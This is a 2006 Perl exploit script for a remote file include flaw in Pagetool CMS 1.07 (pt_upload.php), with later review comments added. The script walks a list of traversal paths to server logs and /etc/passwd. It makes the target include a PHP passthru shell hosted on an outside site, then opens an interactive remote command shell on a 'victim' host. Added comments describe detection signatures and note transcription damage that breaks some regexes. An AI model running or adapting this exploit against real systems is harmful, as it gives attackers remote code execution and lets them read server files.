
# Title : Pagetool CMS <= 1.07 (pt_upload.php) Remote File Include Vulnerability
# Published : 2006-12-24
# Author : g00ns


#!usr/bin/perl
use LWP::UserAgent;
####################################################################
#          ___   ___                         _
#         / _  / _                        | |
#     __ _| | | | | | |_ __  ___   _ __   ___| |_
#   / _` | | | | | | | '_ / __| | '_  / _  __|
#  | (_| | |_| | |_| | | | __ _| | | |  __/ |_
#   __, |___/ ___/|_| |_|___(_)_| |_|___|__|
#    __/ |
#   |___/
#
#===========================INFO====================================
# Impact level: HIGH
#
# Google: powered by pagetool or Pagetool Development Team
#
# browser use:
# http://[ site ]/src/admin/pt_upload.php?config_file=[local server file]&ptconf[src]=[ shell ]?
#
#=========================VULN CODE=================================
# Code:
#
# if (file_exists($config_file))
#{
#     include($config_file);
#
#    ...
#      include($ptconf["src"] . "pagetool/pt_profile.inc");
#      include($ptconf["src"] . "pagetool/pt_functions.inc");
#===================================================================
#
#  Vulnerability Found by: FiSh and godXcel
#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                    #---Exploit---#
#==========================================================#
#         [Pagetool CMS <=1.07 (RFI)]
#    [c]oded by TrinTiTTy -at- g00ns.net
#==========================================================#
#
#    ! Vulnerability by FiSh and godXcel !
#
# Shoutz: z3r0, clorox, wicked, synical, ReZEN, grumpy,
#         SiCK, and everyone else at g00ns.net
#
#    greetz: 13337.org, acircle.us
#
# www.g00ns.net | irc.g00ns.net #g00ns | www.g00ns-forum.net
#
#      #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
#      # Notes:                                     #
#      # Shell example <?passthru($_GET[cmd]);?>    #
#      # Shell variable: ($_GET[cmd]);              #
#      #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
#==========================================================#

# Positional arguments: the target host and the location of the PHP source
# that the remote include will fetch. `@ARGV[0]` / `@ARGV[1]` are one-element
# array slices rather than scalars; they work here but warn under
# `use warnings` (the script enables neither strict nor warnings).
$host = @ARGV[0]; $shell = @ARGV[1];

# Reject a scheme prefix, because every URL below is assembled with a literal
# "http://". NOTE(review): as printed, `/http:///` cannot compile -- the
# separators look like escapes (`\/\/`) lost in transcription, and the bare
# `n` characters inside the print strings throughout the file look like `\n`
# with the same loss. The code is kept as printed.
if ($host =~ /http:/// || $shell =~ /http:///)
   {print "nn [-] Don't include http:// in your links!n";usage();exit();}
# Exactly two arguments are required. This test runs after the scheme test,
# so a lone argument is first matched against `undef` (warns) before the
# argument count is reported.
elsif (@ARGV != 2) {head();usage();exit();}
head();
print "n [!] Scanning for local server config filenn [!] Be patient...n";

# No credz to me for below list..
# Candidate values for the `config_file` parameter: `/etc/passwd` plus
# relative paths to common web-server log locations at several traversal
# depths. The script only needs one of them to exist on the target, because
# the vulnerable code (see header) calls file_exists() before include().
# For detection: these exact strings in `config_file`, combined with an
# absolute `http://` URL in `ptconf[src]`, are the request signature.
# The list holds 41 entries; scan() below walks it with a hard-coded
# inclusive bound of 40, so the two must be kept in sync by hand.
@cfgs = ("/etc/passwd",
         "../apache/logs/error.log",
         "../../../../apache/logs/access.log",
         "../apache/logs/access.log",
         "../../../../../var/log/httpd/error_log",
         "../../apache/logs/error.log",
         "../../apache/logs/access.log",
         "../../../apache/logs/error.log",
         "../../../apache/logs/access.log",
         "../../../../apache/logs/error.log",
         "../../../../../apache/logs/error.log",
         "../../../../../apache/logs/access.log",
         "../logs/error.log",
         "../logs/access.log",
         "../../logs/error.log",
         "../../logs/access.log",
         "../../../logs/error.log",
         "../../../logs/access.log",
         "../../../../logs/error.log",
         "../../../../logs/access.log",
         "../../../../../logs/error.log",
         "../../../../../logs/access.log",
         "../../../../../etc/httpd/logs/access_log",
         "../../../../../etc/httpd/logs/access.log",
         "../../../../../etc/httpd/logs/error_log",
         "../../../../../etc/httpd/logs/error.log",
         "../../../../../var/www/logs/access_log",
         "../../../../../var/www/logs/access.log",
         "../../../../../usr/local/apache/logs/access_log",
         "../../../../../usr/local/apache/logs/access.log",
         "../../../../../var/log/apache/access_log",
         "../../../../../var/log/apache/access.log",
         "../../../../../var/log/access_log",
         "../../../../../var/www/logs/error_log",
         "../../../../../var/www/logs/error.log",
         "../../../../../usr/local/apache/logs/error_log",
         "../../../../../usr/local/apache/logs/error.log",
         "../../../../../var/log/apache/error_log",
         "../../../../../var/log/apache/error.log",
         "../../../../../var/log/access_log",
         "../../../../../var/log/error_log");
# Called before its definition; Perl resolves the name at run time, and the
# empty prototype on the sub is not yet visible here.
scan();
# Probe each candidate `config_file` path in turn, sending the remote-include
# URL in `ptconf[src]` with every request, and classify the response body.
# Reads the globals `$host`, `$shell` and `@cfgs`, and leaves the loop index
# `$i` global as well: commands() below reads `$cfgs[$i]` through it, so the
# two subs are coupled by that shared state.
sub scan(){
  # Inclusive bound of 40 matches the 41 entries in @cfgs; nothing checks
  # that they agree.
  for ($i = 0; $i <=40; ++$i){
  # `|| die` applies to the constructor's return value (an object), so it
  # never fires in practice.
  $ag3nt = LWP::UserAgent->new() || die;
  # The request a defender can match on: `pt_upload.php` with a traversal
  # path in `config_file` and an absolute `http://` URL in `ptconf[src]`.
  $inc = "http://".$host."/src/admin/pt_upload.php?config_file=".$cfgs[$i]."&ptconf[src]=http://".$shell."?";
  $response = $ag3nt->get($inc);
  # One dot per probe, written unbuffered so it shows immediately.
  syswrite STDOUT,".";
  $ans = $response->content;
    # Presumably LWP's own synthesized body for a connection dropped before any
    # response (the server is not reached) -- treated as fatal for the whole
    # scan, not just for this path.
    if( $ans =~ /500 Server closed connection without sending any data back/)
       {print "nn [-] Couldn't Include Shell...better luck next time.nn";exit;}
    # PHP's warning for an empty command string; consistent with the
    # `passthru($_GET[cmd])` shell from the header being included and run with
    # no `cmd` set. commands() never returns (it recurses or exits), so a hit
    # also ends this loop.
    elsif ($ans =~ /Cannot execute a blank command/)
       {print "n [+] Server File: FOUNDnn [+] Executing Command Shell...nnType quit to exit shelln";commands();}}}
# Reached only when scan() exhausts the list without a hit: a hit never
# returns from commands(), and a dropped connection exits inside scan().
print "nn [-] Couldn't find valid config file...better luck next timenn";exit;

# Interactive loop: read one line from STDIN, send it as the `cmd` parameter
# of the included remote file, print the body, then call itself for the next
# line. Implemented by recursion rather than a loop, so every command adds a
# stack frame for as long as the session lasts. Depends on the global `$i`
# left behind by scan()'s loop to re-send the `config_file` path that worked.
sub commands(){
# NOTE(review): inside double quotes both `@box` (an empty array) and `$~`
# (the current format name, default "STDOUT") interpolate, so the prompt
# almost certainly does not print as the author intended.
print "nshell@box $~ ";
  $nix=<STDIN>;
  chomp($nix);
# `/quit/gmi` is unanchored, so any line containing "quit" (any case) ends
# the session.
if ($nix =~ /quit/gmi){print "n [-] Good Byen";exit();}
$ag3nt = LWP::UserAgent->new() || die;
# Same request as scan(), with the typed line appended as `cmd=` and a
# trailing `%00`. The line is concatenated without URL-encoding.
$inc = "http://".$host."/src/admin/pt_upload.php?config_file=".$cfgs[$i]."&ptconf[src]=http://".$shell."?cmd=".$nix.'%00';
$response = $ag3nt->get($inc);
$ans = $response->content;
# Failure heuristic: a PHP warning tag or an anchor anywhere in the body.
# NOTE(review): `</b>` inside the first pattern appears to have lost its
# escape (`<\/b>`) in transcription; as printed the regex does not parse.
if ($ans =~ /<b>Warning</b>:/gmi || $ans =~ /<a href=/gmi)
   {print " n[-] ERROR: Bad command, permissions, website, or shell.n";commands();}
# Any other body is echoed verbatim before prompting again.
else {print "n$ans";commands();}}

sub head(){
    # Banner shown before the scan starts and on a usage error. The text is
    # the original q{} literal reassembled byte for byte: a leading newline,
    # three-space indent on every row, and a trailing three-space tail with
    # no final newline. Returns print's status, as before.
    my @banner = (
        '',
        '   |======================================================|',
        '   |               Pagetool CMS <=1.07 (RFI)              |',
        '   |         [c]oded by TrinTiTTy -at- g00ns.net          |',
        '   | -----------------------------------------------------|',
        '   |                                                      |',
        '   |          Vulnerability by FiSh and godXcel           |',
        '   |            greetz: 13337.org, acircle.us             |',
        '   |                                                      |',
        '   |                   www.g00ns.net                      |',
        '   |======================================================|',
        '   ',
    );
    print join("\n", @banner);
}
sub usage(){
    # Command-line help printed on a usage error. Same bytes as the original
    # q{} literal: leading newline, one-space indent, a blank line between the
    # two entries, and a trailing three-space tail without a final newline.
    # Returns print's status, as before.
    my @help = (
        '',
        ' Usage: perl pagetool07.pl <host> <shell location>',
        '',
        ' Example: perl pagetool07.pl www.victim.net www.shellsite.com/shell.txt',
        '   ',
    );
    print join("\n", @help);
}

# www.Syue.com [2006-12-24]